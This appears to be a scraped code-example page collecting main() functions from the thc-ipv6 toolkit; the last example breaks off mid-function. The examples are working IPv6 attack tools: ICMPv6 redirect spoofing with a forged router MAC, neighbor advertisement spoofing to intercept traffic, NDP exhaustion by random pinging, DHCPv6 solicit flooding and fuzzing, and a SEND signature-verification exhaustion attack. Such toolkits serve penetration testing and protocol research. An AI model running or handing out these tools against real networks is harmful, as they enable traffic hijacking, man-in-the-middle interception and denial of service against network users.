  if (thc_add_pim(pkt1, &pkt1_len, mode, buf, len) < 0)
    return -1;
  if (thc_generate_pkt(interface, NULL, NULL, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0)
    usleep(5);

  printf("Sent PIM %s message\n", mode == 0 ? "hello" : mode == 1 ? "join" : "prune");

  return 0;
}
예제 #11
0
int main(int argc, char *argv[]) {
  char string[] = "ip6 and ! src net f000::/4 and ! dst net f000::/4";
  int rawmode = 0, i;
  pcap_t *p;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "cr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      offset = 0;
      break;
    case 'c':
      loop = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 3)
    help(argv[0]);

  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[optind];
  mac6 = thc_get_own_mac(interface);
  src6 = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
  mtu = atoi(argv[optind + 2]);
  
  if (src6 == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface or IPv6 not available: %s\n", interface);
    exit(-1);
  }

  if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') {
    ip6 = NULL;
  } else {
    ip6 = thc_resolve6(argv[optind + 1]);
    if (ip6 == NULL) {
      fprintf(stderr, "Error: target address is invalid: %s\n", argv[optind + 1]);
      exit(-1);
    }
  }

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Watching for %s from %s (Press Control-C to end) ...\n", loop == 0 ? "a packet" : "packets", argv[optind + 1]);

  do {
    thc_pcap_check(p, (char *) send_toobig, NULL);
    usleep(25);
  } while (go);

  thc_pcap_close(p);
  return 0;
}
예제 #12
0
파일: redir6.c 프로젝트: Chewlee/thc-ipv6
int main(int argc, char *argv[]) {
    unsigned char *pkt = NULL, buf[16], mac[16] = "";
    unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac;
    thc_ipv6_hdr *ipv6;
    char *interface;
    int pkt_len, rawmode = 0, ttl = 64, offset = 14;

    if (argc < 6 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    if (strcmp(argv[1], "-r") == 0) {
        thc_ipv6_rawmode(1);
        rawmode = 1;
        argv++;
        argc--;
    }

    if (do_hdr_size)
        offset = do_hdr_size;
    interface = argv[1];
    src6 = thc_resolve6(argv[2]);
    target6 = thc_resolve6(argv[3]);
    oldrouter6 = thc_resolve6(argv[4]);
    if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]);
        exit(-1);
    }

    if (thc_get_own_mac(interface) == NULL) {
        fprintf(stderr, "Error: invalid interface %s\n", interface);
        exit(-1);
    }
    /* Spoof source mac */
    if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
        fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
        exit(-1);
    }
    if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
        fprintf(stderr, "Error: could not resolve mac address for original-router\n");
        free(self6);
        exit(-1);
    }

    if (rawmode == 0) {
        if (argc >= 7)
            sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
                   (unsigned int *) &mac[5]);
        else
            mac6 = thc_get_own_mac(interface);
    }

    if (argc >= 8)
        ttl = atoi(argv[7]);
    if (ttl <= 0 || ttl > 255)
        ttl = 64;

    memset(buf, 'A', 16);

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
        return -1;
    if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
        fprintf(stderr, "Error: Can not send packet, exiting ...\n");
        exit(-1);
    }

    usleep(25000);
    ipv6 = (thc_ipv6_hdr *) pkt;
    thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
    ipv6->pkt[offset + 7] = (unsigned char) ttl;

    thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14);
    printf("Sent ICMPv6 redirect for %s\n", argv[3]);

    free(self6);
    free(fakemac);

    return 0;
}
예제 #13
0
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
  char wdatabuf[1024], wdatabuf2[1024];
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 1, use_real_link = 1;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;        // no break
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  dns_name = argv[optind + 1];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  len2 = sizeof(inforeq);
  memcpy(wdatabuf2, inforeq, len2);

  printf("Sending DHCPv6 Solicitate message ...\n");
  printf("Sending DHCPv6 Information Request message ...\n");
  if (!use_real_link)
    memcpy(src + 8, (char *) &count, 8);
    // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 32] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    mac[i + 2] = rand() % 256;
  }
  if (!use_real_mac)
    memcpy(wdatabuf + 22, mac, 6);
  if (!use_real_mac)
    memcpy(wdatabuf2 + 18, mac, 6);
  memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
  memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    printf("!");
  if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
    printf("!");
  signal(SIGALRM, clean_exit);
  alarm(3);
//  i = thc_send_pkt(interface, pkt, &pkt_len);
  pkt = thc_destroy_packet(pkt);
  while (1) {
    usleep(75);
    while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
  }

  return 0;                     // never reached
}
예제 #14
0
int main(int argc, char *argv[]) {
  int rawmode = 0, offset = 14;
  char string[256] = "ip6";

  if (argc < 5 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  if (do_hdr_size)
    offset = do_hdr_size;
  interface = argv[1];
  if ((src6 = thc_resolve6(argv[2])) == NULL) {
    if (strcmp(argv[2], "*") != 0) {
      fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]);
      exit(-1);
    }
  }
  if ((dest6 = thc_resolve6(argv[3])) == NULL) {
    if (strcmp(argv[3], "*") != 0) {
      fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]);
      exit(-1);
    }
  }

  if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) {
    fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]);
    exit(-1);
  }

  if (argc >= 6) {
    if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
      fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]);
      exit(-1);
    }
  } else
    newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
    
  /* Spoof source mac */
  if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
    fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
    exit(-1);
  }
  if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
    fprintf(stderr, "Error: could not resolve mac address for original-router\n");
    free(self6);
    exit(-1);
  }

  mac6 = mac;
  if (argc >= 7)
    sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);
  realownmac = thc_get_own_mac(interface);

  if (src6 != NULL) {
    strcat(string, " and src ");
    strcat(string, thc_ipv62notation(src6));
  }
  if (dest6 != NULL) {
    strcat(string, " and dst ");
    strcat(string, thc_ipv62notation(dest6));
  }

  printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n");
  return thc_pcap_function(interface, string, (char *) intercept, 1, NULL);
}
예제 #15
0
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  // defines mac as 6 pieces and defines pkt as null.
  char wdatabuf[1024];
  //builds data buffer and sets memory size at 1024mb
  unsigned char *mac6 = mac, *src, *dst;
  //creates mac6 address usuing
  int i, s, len, pkt_len = 0, dlen = 0;
  int do_all = 1, use_real_mac = 1, use_real_link = 1;
  int state;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  //Parse options
  while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
    switch (i) {
    case '1':
      do_type = DO_SOL;
      break;
    case '2':
      do_type = DO_REQ;
      break;
    case '3':
      do_type = DO_CON;
      break;
    case '4':
      do_type = DO_REN;
      break;
    case '5':
      do_type = DO_REB;
      break;
    case '6':
      do_type = DO_REL;
      break;
    case '7':
      do_type = DO_DEC;
      break;
    case '8':
      do_type = DO_INF;
      break;
    case 'm':
      fuzz_msg_type = 1;
      break;
    case 'n':
      no_send = atoi(optarg);
      break;
    case 't':
      test_start = atoi(optarg);
      break;
    case 'e':
      test_end = atoi(optarg);
      break;
    case 'T':
      test_end = test_start = atoi(optarg);
      break;
    case 'F':
      use_real_link = 0;        // no break
    case 'f':
      use_real_mac = 0;
      break;
    case 'p':
      ping = atoi(optarg);
      break;
    case 'd':
      do_dns = 1;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  //Check options
  if (no_send < 1) {
    fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
    exit(-1);
  }

  if (test_end < test_start) {
    printf("don't f**k up the command line options!\n");
    exit(-1);
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  dns_name = argv[optind + 1];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac) {
    mac6 = thc_get_own_mac(interface);
    memcpy(mac, mac6, sizeof(mac));
  }
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }

  //Establish state
  if (do_type == DO_SOL || do_type == DO_REB)
    state = STATELESS;
  else
    state = STATEFULL;

  // generate full fuzz mask for stateless types and partial for statefull types
  strcpy(fuzzbuf, fuzztype_ether);
  strcat(fuzzbuf, fuzztype_ip6);
  strcat(fuzzbuf, fuzztype_udp);
  if (fuzz_msg_type)
    strcat(fuzzbuf, fuzztype_dhcp6);
  else
    strcat(fuzzbuf, fuzztype_dhcp6no);
  if (state == STATELESS) {
    strcat(fuzzbuf, fuzztype_elapsed_time);
    strcat(fuzzbuf, fuzztype_client_identifier);
    strcat(fuzzbuf, fuzztype_IA_NA);
    if (do_dns)
      strcat(fuzzbuf, fuzztype_FQDN);
  }

  /** Generate packet **/
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);

  //Add dns option
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8;
    len += sizeof(dnsupdate1);
    dns_option_hdr_len += sizeof(dnsupdate1);

    //Append domain string prefix fuzz mask
    if (state == STATELESS) { //<-- Do fuzzbuffer later
      for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix
        strcat(fuzzbuf, "B");
    }

    if (dns_name != NULL && strlen(dns_name) < 240) {
      if (dns_name[0] != '.') {
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
      memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1);
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
      dns_option_hdr_len += strlen(dns_name) + 1;

      //Append variable length domain string suffix fuzz mask
      if (state == STATELESS) {
        for (i = 0; i < strlen(dns_name) + 1; ++i)
          strcat(fuzzbuf, "B");
      }
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
    dns_option_hdr_len += sizeof(dnsupdate2);

    //Append option request (FQDN request) fuzz mask
    if (state == STATELESS){
      strcat(fuzzbuf, fuzztype_option_request);
    }
  }

  //Set message type
  if (state == STATELESS) {
    switch (do_type) {
    case DO_SOL:
      wdatabuf[0] = 0x01;
      break;
    case DO_REB:
      wdatabuf[0] = 0x06;
      break;
    default:
      break;
    }
  }
  
  //random src mac
  if (!use_real_link)
    for (i = 0; i < 8; i++)
      src[i + 8] = rand() % 256;

  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 1] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    wdatabuf[i + 32] = rand() % 256;
    if (!use_real_mac) {
      mac[i * 2] = rand() % 256;
      mac[i * 2 + 1] = rand() % 256;
    }
    if (do_dns)
      wdatabuf[i + dlen] = 'a' + rand() % 26;
  }
  memcpy(wdatabuf + 22, mac, 6);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;

  if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    return -1;

  //Fuzz solicit packet
  if (state == STATELESS) {
    if (fuzz_loop(pkt, &pkt_len) < 0)
      return -1;
  }

  //Fuzz request, confirm or renew paket
  else if (state == STATEFULL) {
    //Send a dhcp solicit to discover dhcpv6 servers
    if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Failed to send initial solicit packet\n");
      return -1;
    }

    usleep(75); //<-- I don't really know why this is neccessary but it seems to be

    //Construct and fuzz packets using server identifier
    got_packet = 0;
    time_t start_time = time(NULL);
    while(time(NULL) - start_time < timeout) {
      while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function
      if (got_packet)
        break;
    }
    if (!got_packet)
       fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
  }

  pkt = thc_destroy_packet(pkt);

  // printf("fuzzbuf: %s\n", fuzzbuf);


  return 0;
}
예제 #16
0
int main(int argc, char *argv[]) {
  char *interface;
  int prefer = PREFER_GLOBAL;
  unsigned char *srcmac;
  unsigned char *dst6, *src6;
  unsigned char *ptr;
  //char dstmac[6] = "";
  unsigned char *dstmac = NULL, *tmpmac, *dstnet;
  int pkt_len = 16;
  int count = 0;
  int i;
  int size, numbytes, samenet = 0;
  unsigned char *pkt = NULL;
  unsigned char buf[] = "NDP Exhaustion";

  // hardcoded mac
  /*dstmac[0] = 0x00;
     dstmac[1] = 0x05;
     dstmac[2] = 0x73;
     dstmac[3] = 0xa0;
     dstmac[4] = 0x00;
     dstmac[5] = 0x01; */

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    printf("Error: invalid interface defined: %s\n", interface);
    exit(-1);
  }
  dstnet = argv[2];             // hier stehts dstnet drin
  if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }

  *ptr++ = 0;
  size = atoi(ptr);             // prefix lenght
//  printf("Prefix length is %d\n", size);
  if (size != 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
  numbytes = (128 - size) / 8;  // number of bytes to create
//  printf("Creating %d random adress bytes\n", numbytes);
  srand(time(NULL) + getpid()); // initalize random number generator
  dst6 = thc_resolve6(dstnet);
//  thc_dump_data(dst6, 16, "dst");
  if (argc >= 4)
    src6 = thc_resolve6(argv[3]);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
//  thc_dump_data(src6, 16, "src");
  dstmac = thc_get_mac(interface, src6, dst6);

  printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface);
  while (1) {
    ++count;
    for (i = 0; i < numbytes; i++) {
      dst6[16 - numbytes + i] = rand() % 256;   // direct destination manipulation
    }
    if (count == 1) {
      tmpmac = thc_get_mac(interface, src6, dst6);
      if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0)
        samenet = 1;
    } else {
      if (samenet == 0) {
        free(dstmac);
        dstmac = thc_get_mac(interface, src6, dst6);
      }
    }

    //  printf("%s\n", ip6adr);
//  printf("Sending ICMP ECHO to %s\n", ip6adr);
    if ((pkt = thc_create_ipv6(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n");
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1)
      errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n");
    //thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf));

    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      printf("!");
    thc_destroy_packet(pkt);
    usleep(1);
    if (count % 100 == 0)
      printf(".");
  }
}
예제 #17
0
int main(int argc, char *argv[]) {
  char dummy[24], mac[16] = "", buf2[6], buf3[1398];
  unsigned char *ownmac = mac;
  int i, j;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  if (debug)
    printf("Preparing spoofed packet for speed-up\n");

  while ((i = getopt(argc, argv, "FHDRl")) >= 0) {
    switch (i) {
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    case 'R':
      do_reverse = 1;
      break;
    case 'l':
      do_loop = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1)
    help(argv[0]);
  interface = argv[optind];
  if (argc - optind == 2 && argv[optind + 1] != NULL)
    sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    ownmac = thc_get_own_mac(interface);
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  memset(dummy, 'X', sizeof(dummy));
  dummy[16] = 2;
  dummy[17] = 1;
  memcpy(&dummy[18], ownmac, 6);
  memset(buf2, 0, sizeof(buf2));
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  for (i = 0; i <= 0 + do_reverse; i++) {
//    printf("i: %d\n", i);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (do_hop) {
      ptype = NXT_HBH;
      if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
        return -1;
    }
    if (do_frag) {
      if (ptype == NXT_ICMP6)
        ptype = NXT_FRAG;
      for (j = 0; j < do_frag; j++)
        if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
          return -1;
    }
    if (do_dst) {
      if (ptype == NXT_ICMP6)
        ptype = NXT_DST;
      if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
        return -1;
    }
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0)
      return -1;
    if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2);    // reset checksum to zero
    if (debug) {
      thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet");
      printf("\n");
    }
//    printf("i: %d, do_reverse: %d\n", i, do_reverse);
    if (i == 0 && do_reverse) {
//      printf("ipv62->ipv6 %p\n", ipv6);
      ipv62 = ipv6;
      ipv62->pkt[0] = 0x33;     // multicast mac hack for destination
      ipv62->pkt[1] = 0x33;     // multicast mac hack for destination
      ipv6 = NULL;
      pkt2 = pkt;
      pkt = NULL;
      pkt2_len = pkt_len;
      pkt_len = 0;
      ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only
    }
  }

  signal(SIGTERM, kill_children);
  signal(SIGSEGV, kill_children);
  signal(SIGHUP, kill_children);
  signal(SIGINT, kill_children);
  memset((char*)pp, 0, sizeof(pp));

  printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n");
  printf(" =>  echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n");
  printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n");
  return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL);
}
예제 #18
0
/* main function */
int main(int argc, char **argv) {
  thc_cga_hdr *cga_opt;         /* CGA header */
  thc_key_t *key;               /* public key */
  unsigned char *pkt = NULL;    /* generic packet space */
  unsigned char *dst6, *cga, *dev;      /* IPv6 addrs */

/* various parts of packets, temporaries */
  char advdummy[16], soldummy[24], prefix[8], *addr;

/* MAC addresses for testing, attacking */
//  unsigned char dsthw[] = "\xff\xff\xff\xff\xff\xff";
//  unsigned char tgthw[] = "\x00\x1a\xa0\x41\xf0\x2d";   /*real attack mac */
  unsigned char *tgthw;

//  unsigned char srchw[] = "\xdd\xde\xad\xbe\xef\xdd";
//  unsigned char srchwreal[] = "\x00\x11\x11\x32\xb2\x84";
//  unsigned char tag[] = "\xdd\xde\xad\xbe\xef\xdd\xdd\xde\xad\xbe\xef\xdd\xbe\xef\xaa\xaa";
  int pkt_len = 0;              /* packet length */
  int flags = 0;                /* ICMPv6 flags */

//  thc_ipv6_rawmode(0);          /* generate my own MAC addresses */
  int debug = 0;                /* debug switch */
  FILE *fp;                     /* file pointer for reading from /dev/urandom */
  unsigned char test[6];        /* randomized mac storage */
  int result = 0, pid, status, i;       /* exit codes */
  int count = 1000000000;

  if (argc != 5) {
    printf("original sendpees by willdamn <*****@*****.**>\n");
    printf("modified sendpeesMP by Marcin Pohl <*****@*****.**>\nCode based on thc-ipv6\n\n");
    printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]);
    printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n");
    printf("Example: %s eth0 2048 fe80:: fe80::1\n\n", argv[0]);
    exit(1);
  }

  memset(&test, 0, 6);          /* set 6 bytes to zero */
  fp = fopen("/dev/urandom", "r");      /* set FP to /dev/urandom */
  dev = argv[1];                /* read interface from commandline */
  if ((addr = thc_resolve6(argv[3])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
    exit(-1);
  }
  if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", dev);
    exit(-1);
  }

  memcpy(prefix, addr, 8);      /* first 8 bytes of sockaddr is prefix */
  key = thc_generate_key(atoi(argv[2]));        /* EXPENSIVE KEYGEN HERE! */
  if (key == NULL) {
    printf("Couldn't generate key!");
    exit(1);
  }

/*makes options and the address*/
  cga_opt = thc_generate_cga(prefix, key, &cga);

/* cga = thc_resolve6("::"); */
  if (cga_opt == NULL) {
    printf("Error during CGA generation");
    exit(1);
  }

/* ICMP6 TARGET, IPDST */
  if (argv[4] == NULL)
    dst6 = thc_resolve6("ff02::1");
  else
    dst6 = thc_resolve6(argv[4]);

  tgthw = thc_get_mac(dev, cga, dst6);

  test[0] = 0;                  /* set MAC to intel */
  test[1] = 170;                /* set MAC to intel */
  test[2] = 0;                  /* set MAC to intel */


/* set ICMP OPTION SLLA HERE */
  memset(advdummy, 'D', sizeof(advdummy));
  memset(soldummy, 'D', sizeof(soldummy));

/* set destination IP here */
  memcpy(advdummy, dst6, 16);   /*dstIP */
  memcpy(soldummy, dst6, 16);   /*dstIP */

/* fixed values for NS */
  soldummy[16] = 1;
  soldummy[17] = 1;
  memcpy(&soldummy[18], test, 6);       /* SLLA OPTION */

/* ND flags */
  flags = ICMP6_NEIGHBORADV_OVERRIDE;


  /* the forking starts here */
  for (i = 0; i < THREAD_NUM; ++i) {
    pid = fork();
    if (pid == 0) {
      printf("Creating thread %d\n", i);

/*randomize MAC here*/
      result = fread((char *) &test[3], 1, 3, fp);

/* create IPv6 portion */
      if ((pkt = thc_create_ipv6_extended(dev, PREFER_LINK, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) {
        printf("Cannot create IPv6 header\n");
        exit(1);
      }

/* create ICMPv6 with SeND options */
      if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0x0, flags, soldummy, 24, cga_opt, key, NULL, 0) < 0) {
        printf("Cannot add SEND options\n");
        exit(1);
      }
      free(cga_opt);
      if (debug) {
        printf("%02x:%02x:%02x:%02x:%02x:%02x\n", test[0], test[1], test[2], test[3], test[4], test[5]);
//        printf("%02x:%02x:%02x:%02x:%02x:%02x\n", dsthw[0], dsthw[1], dsthw[2], dsthw[3], dsthw[4], dsthw[5]);
        fflush(stdout);
